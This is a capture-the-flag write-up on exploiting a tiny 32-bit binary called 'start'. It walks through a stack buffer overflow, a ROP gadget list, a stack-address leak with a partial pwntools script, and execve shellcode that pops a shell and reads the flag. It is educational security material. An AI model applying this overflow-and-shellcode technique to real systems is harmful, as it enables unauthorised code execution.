Alright so my first steps were to download the binary and open it up in ghidra. Opening it up in ghidra yielded nothing because the program was a super basic opcodes. With no libraries. This made it really hard for ghidra to figure out what the functions were really doing. This meant I would have to open it up in GDB to see what was happening in the dissassembly.
I first ran the program to see what it did. All it did was send a 20-byte message:
Let's start the CTF:
then it gave a prompt. It seemed like anything you sent in the prompt would exit the program.
I opened the binary in GDB to find exactly that. Looking at the functions I found “_start” was where all the magic happened. It was very crude instructions in 32-bit. It looked a little bit like this:
I was interested in this part:
xor ebx,ebx
mov dl,0x3c
mov al,0x3
int 0x80
This essentially called read(0, ???, 0x3c)
The ??? was confusing, but then I read up above mov ecx,esp
which meant that ecx was representing the stack, so it would be read(0, stack, 0x3c)
This meant there was an easy buffer overflow, but not as easy as I originally imagined. Essentially the stack looked like this:
0xffffbf04 ◂— 0x2774654c ("Let'")
0xffffbf08 ◂— 0x74732073 ('s st')
0xffffbf0c ◂— 0x20747261 ('art ')
0xffffbf10 ◂— 0x20656874 ('the ')
0xffffbf14 ◂— 0x3a465443 ('CTF:')
0xffffbf18 —▸ 0x804809d (_exit)
So when the program ran it would overwrite the stack with your input up to 0x3c
bytes. So if you typed blah
the stack would look like:
0xffffbf04 ◂— 0x68616c62 ("blah")
0xffffbf08 ◂— 0x74732073 ('s st')
0xffffbf0c ◂— 0x20747261 ('art ')
0xffffbf10 ◂— 0x20656874 ('the ')
0xffffbf14 ◂— 0x3a465443 ('CTF:')
0xffffbf18 —▸ 0x804809d (_exit)
This means that you would have to type 20 characters before you hit the return address.
= 60 so you have 60-20 = 40 bytes of buffer overflow. Thats a good amount. I ended up looking at the ROPgadgets to see what I could do to change the control flow of the program:
$ ROPgadget --binary ./start
0x0804809b : adc al, 0xc3 ; pop esp ; xor eax, eax ; inc eax ; int 0x80
0x0804808e : add al, 0xcd ; xor byte ptr [ecx], 0xdb ; mov dl, 0x3c ; mov al, 3 ; int 0x80
0x08048099 : add esp, 0x14 ; ret
0x08048086 : daa ; mov ecx, esp ; mov dl, 0x14 ; mov bl, 1 ; mov al, 4 ; int 0x80 0x080480a0 : inc eax ; int 0x80
0x0804808f : int 0x80
0x0804809a : les edx, ptr [ebx + eax*8] ; pop esp ; xor eax, eax ; inc eax ; int 0x80
0x08048095 : mov al, 3 ; int 0x80
0x0804808d : mov al, 4 ; int 0x80
0x0804808b : mov bl, 1 ; mov al, 4 ; int 0x80
0x08048089 : mov dl, 0x14 ; mov bl, 1 ; mov al, 4 ; int 0x80
0x08048093 : mov dl, 0x3c ; mov al, 3 ; int 0x80
0x08048087 : mov ecx, esp ; mov dl, 0x14 ; mov bl, 1 ; mov al, 4 ; int 0x80
0x0804809d : pop esp ; xor eax, eax ; inc eax ; int 0x80
0x0804809c : ret
0x08048090 : xor byte ptr [ecx], 0xdb ; mov dl, 0x3c ; mov al, 3 ; int 0x80
0x0804809e : xor eax, eax ; inc eax ; int 0x80
0x08048091 : xor ebx, ebx ; mov dl, 0x3c ; mov al, 3 ; int 0x80
Seeing this I realized my options were limited, but I decided to start trying things out. The first gadget I tried was: 0x080480a0 : inc eax ; int 0x80
since I knew it would change the function that gets called. What I got was 0x18 + 1
for my eax value which corresponded to the stime
syscall. After trying different inputs I found that eax was being saved from the read
function which would return the size of the input. Which was 0x18
. When I increased the size of the input, I could get different syscall codes untill I reached 0x3c
(the max read size). Looking at my options for possible syscalls led to nothing. So that idea was scrapped.
The next idea I had was to use shellcode in my input to run some code (maybe pop a shell). Looking at vmmap
I realized that might be possible since the stack was executable. The addresses of the stack were randomized though, so I had to find a way to leak the stack. Looking at the ROPgadgets I saw this function:
0x08048087 : mov ecx, esp ; mov dl, 0x14 ; mov bl, 1 ; mov al, 4 ; int 0x80
Essentially this would print out 20 bytes from the stack. since we had already moved the stack pointer past the string that it gives, it would run: write(1, stack, 0x14)
this is what my program looked like:
#! /usr/bin/env python
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
addr_ecx2 = 0x08048087
p = process("./start")
gdb.attach(p, 'b _start')
payload = b"A"*(0x14)
payload += p32(addr_ecx2)
x = p.recv()
I was able to leak 3 addresses with one of them in the same page as the stack:(x[0:4]
This was some really good news. It meant I could run shellcode directly. So I created a new program that would send Shellcode in my input and then send the program to that spot in the stack. This would be the control flow:
-> enter "A"*0x14 + 0x08048087
-> _start+39
= 0x08048087
-> read stack address -> enter shellcode + stack address
-> stack address
The program I wrote did exactly that. My shellcode looked like this:
And it didn’t work.
Why? The shellcode I thought was too long. I thought the shellcode was somehow breaking after like 10 characters. I spent an insane amount of time trying to get the shellcode to be small enough to fit into the space. Then I looked really hard at what was happening. The instructions from my shellcode looked like this:
push $SYS_execve
pop %eax
push $0
push $0x68732f6e
push $0x69622f2f
xor %ecx, %ecx
push %esp
pop %ebx
int $0x80
I noticed that when the program got to push $0x69622f2f
it would overwrite the rest of the shellcode. OF COURSE!!! The shellcode was on the stack and pushing values onto the stack would overwrite those values.
All I had to do to solve it was place the shellcode at the end of my input so it would overwrite useless parts of the stack and boom! it worked:
$ ls
bin boot dev etc home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
$ cd home
$ cd start
$ ls
$ cat flag
The final expoit script is in this repo.